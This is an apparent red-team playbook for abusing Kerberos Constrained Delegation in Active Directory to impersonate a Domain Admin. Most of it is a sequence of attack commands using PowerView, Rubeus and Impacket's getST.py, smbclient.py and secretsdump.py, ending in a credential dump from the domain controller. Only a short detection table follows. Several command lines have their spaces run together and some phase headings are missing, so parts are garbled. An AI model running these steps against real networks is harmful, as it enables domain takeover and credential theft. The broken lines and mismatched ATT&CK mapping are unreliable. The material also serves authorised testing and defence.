Exploit Kerberos Constrained Delegation misconfigurations in Active Directory to impersonate privileged users via S4U2self and S4U2proxy extensions for lateral movement and privilege escalation.
cybersecurity
red-teaming
red-team
active-directory
kerberos
constrained-delegation
s4u2proxy
privilege-escalation
lateral-movement
1.0
mahipal
MIT
Exploiting Constrained Delegation Abuse
Overview
Kerberos Constrained Delegation (KCD) is a Windows Active Directory feature that allows a service to impersonate a user and access specific services on their behalf. The delegation targets are defined in the msDS-AllowedToDelegateTo attribute. When an attacker compromises an account configured with Constrained Delegation (particularly with the TRUSTED_TO_AUTH_FOR_DELEGATION flag), they can use the S4U2self and S4U2proxy Kerberos protocol extensions to request service tickets as any user (including Domain Admins) to the delegated services. If the delegation target includes services like CIFS, HTTP, or LDAP on a Domain Controller, this results in full domain compromise. The S4U2self extension requests a forwardable ticket on behalf of any user to the compromised service, and S4U2proxy forwards that ticket to the allowed delegation target.
Objectives
Enumerate accounts with Constrained Delegation configured in the domain
Identify delegation targets (msDS-AllowedToDelegateTo) for high-value services
Exploit S4U2self and S4U2proxy to impersonate Domain Admin
Obtain service tickets for delegated services as a privileged user
Access delegated services (CIFS, LDAP, HTTP) on target hosts
Escalate to Domain Admin through Constrained Delegation abuse
MITRE ATT&CK Mapping
T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting
T1550.003 - Use Alternate Authentication Material: Pass the Ticket
Find accounts with Constrained Delegation using PowerView:
# Find users with Constrained DelegationGet-DomainUser-TrustedToAuth|Select-Objectsamaccountname,msds-allowedtodelegateto# Find computers with Constrained DelegationGet-DomainComputer-TrustedToAuth|Select-Objectsamaccountname,msds-allowedtodelegateto# Using AD ModuleGet-ADObject-Filter{msDS-AllowedToDelegateTo-ne"$null"}-PropertiesmsDS-AllowedToDelegateTo,userAccountControl
MATCH (c) WHERE c.allowedtodelegate IS NOT NULL
RETURN c.name, c.allowedtodelegate
Check for the TRUSTED_TO_AUTH_FOR_DELEGATION flag (protocol transition):
# UserAccountControl flag 0x1000000 = TRUSTED_TO_AUTH_FOR_DELEGATIONGet-DomainUser-TrustedToAuth|Select-Objectsamaccountname,useraccountcontrol
Phase 2: Exploit with Rubeus (Windows)
If you have the password or hash of the constrained delegation account:
# Request TGT for the constrained delegation accountRubeus.exeasktgt/user:svc_sql/domain:domain.local/rc4:<ntlm_hash># Perform S4U2self + S4U2proxy to impersonate administratorRubeus.exes4u/ticket:<base64_tgt>/impersonateuser:administrator\/msdsspn:CIFS/DC01.domain.local/ptt# Alternative: specify alternate service nameRubeus.exes4u/ticket:<base64_tgt>/impersonateuser:administrator\/msdsspn:CIFS/DC01.domain.local/altservice:LDAP/ptt
Request service ticket via S4U protocol extensions:
# Using getST.py with S4U
getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
-dc-ip 10.10.10.1 domain.local/svc_sql:'ServicePass123'# Using hash instead of password
getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
-hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 \
-dc-ip 10.10.10.1 domain.local/svc_sql
# Use the obtained ticketexportKRB5CCNAME=administrator.ccache
smbclient.py -k -no-pass domain.local/administrator@DC01.domain.local
Phase 4: Alternate Service Name Abuse
Kerberos service tickets are not validated against the SPN in the ticket, allowing SPN substitution:
# Request CIFS ticket, then use it for LDAP (DCSync)
getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
-altservice LDAP/DC01.domain.local \
-dc-ip 10.10.10.1 domain.local/svc_sql:'ServicePass123'exportKRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass domain.local/administrator@DC01.domain.local
This technique works because the service name in the ticket is not cryptographically bound to the session key
Phase 5: Protocol Transition Attack
If the account has TRUSTED_TO_AUTH_FOR_DELEGATION:
# S4U2self obtains a forwardable ticket without requiring the user to authenticate# This means we can impersonate ANY user without their password
getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
-dc-ip 10.10.10.1 domain.local/svc_sql:'ServicePass123'
Without TRUSTED_TO_AUTH_FOR_DELEGATION, S4U2self tickets are non-forwardable and S4U2proxy will fail (unless using Resource-Based Constrained Delegation)
Tools and Resources
Tool
Purpose
Platform
Rubeus
S4U Kerberos ticket manipulation
Windows (.NET)
getST.py
S4U service ticket requests (Impacket)
Linux (Python)
findDelegation.py
Delegation enumeration (Impacket)
Linux (Python)
PowerView
AD delegation enumeration
Windows (PowerShell)
BloodHound CE
Visual delegation path analysis
Docker
Kekeo
Advanced Kerberos toolkit
Windows
Delegation Types Comparison
Type
Attribute
Scope
Attack Complexity
Unconstrained
TRUSTED_FOR_DELEGATION
Any service
Low (capture TGTs)
Constrained
msDS-AllowedToDelegateTo
Specific SPNs
Medium (S4U abuse)
Constrained + Protocol Transition
+ TRUSTED_TO_AUTH_FOR_DELEGATION
Specific SPNs
Medium (no user auth needed)
Resource-Based (RBCD)
msDS-AllowedToActOnBehalfOfOtherIdentity
On target
Medium (writable attribute)
Detection Signatures
Indicator
Detection Method
S4U2self ticket requests
Event 4769 with unusual service and impersonation
S4U2proxy forwarded tickets
Event 4769 with delegation flags set
Alternate service name in ticket
Mismatch between requested SPN and actual service access
Rubeus.exe execution
EDR process detection, command-line logging
Delegation configuration changes
Event 5136 for msDS-AllowedToDelegateTo modifications